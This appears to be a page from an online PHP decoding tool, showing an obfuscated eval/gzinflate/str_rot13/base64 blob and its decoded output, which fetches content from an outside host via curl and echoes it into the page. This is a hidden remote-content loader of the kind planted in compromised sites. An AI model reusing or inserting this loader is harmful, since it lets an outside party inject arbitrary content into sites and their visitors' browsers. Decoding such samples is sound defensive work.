Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

eval(gzinflate(str_rot13(base64_decode('BcHJYYJAAADQzxHCAaPDlqYHpIBVlVqK9NIgDDCLjOAgy9f3Pf..

Decoded Output download

$url = "https://nlinks.xyz/s?i=3260664311&f=o";
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
curl_setopt($ch, CURLOPT_TIMEOUT, 10);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HEADER, false);
$response = curl_exec($ch);
curl_close($ch);
echo $response;

Did this file decode correctly?

Original Code

eval(gzinflate(str_rot13(base64_decode('BcHJYYJAAADQzxHCAaPDlqYHpIBVlVqK9NIgDDCLjOAgy9f3PfguqNCsqKt2waFjL15DBX8VLEwFhVpdGrEFvMk266lNcocceZc8BxotXssRb2H2khKwnAhhdFidwz1Lt9uixk2nyQ0I3lCTx3R7pNlA184vxlRflQaUT0KufhRf/7pZze49lhwRlLPI+e2v3bW/z73/VWwkhbfESux+TAxB3ISkXHIaGS/soAYAJo4bpOmxlxhB8IXjAKRH0doJIze30/kbWLMduyoedEvrSZkdpzgLswZRFV1p7Ono9em278xdrFR1deFINjNVWueMcdP73Iii+PEP'))));

Function Calls

gzinflate 2
str_rot13 1
base64_decode 2

Variables

None

Stats

MD5 554a8f1c68787fe589d99cce0547b2f9
Eval Count 2
Decode Time 67 ms